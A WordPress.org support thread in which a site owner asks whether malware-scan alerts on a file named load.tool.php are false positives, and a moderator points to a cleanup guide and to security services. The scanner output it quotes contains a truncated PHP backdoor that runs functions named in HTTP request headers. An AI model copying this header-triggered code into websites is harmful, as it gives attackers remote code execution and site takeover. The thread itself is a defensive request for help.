Possible malware | WordPress.org

zimmer46
(@zimmer46)

5 years, 3 months ago

My site recent malware scans keep reporting multiple files as being infected. All of them are of the same nature and are reported as some form of backdoor. See below. Is there something I can do to either stop this, or are these false positives ?

Filename: load.tool.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans.

The matched text in this file is: <?php\x0a\x0a$_HEADERS = getallheaders();\x0aif (isset($_HEADERS[‘If-Modified-Since’])) {\x0a $_admin_l_init = $_HEADERS[‘If-Modified-Since’](”, $_HEADERS[‘Clear-Site-Data’]($_HEADERS[‘Server-Timing’]));\x0a …

The issue type is: Backdoor:PHP/rce.if-modified.9373
Description: Injected malware code used for remote code execution and site takeovers

The page I need help with: [log in to see the link]

Viewing 1 replies (of 1 total)

Moderator Steven Stern (sterndata)
(@sterndata)

Volunteer Forum Moderator

5 years, 3 months ago

Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Viewing 1 replies (of 1 total)

The topic ‘Possible malware’ is closed to new replies.

In: Everything else WordPress
1 reply
2 participants
Last reply from: Steven Stern (sterndata)
Last activity: 5 years, 3 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics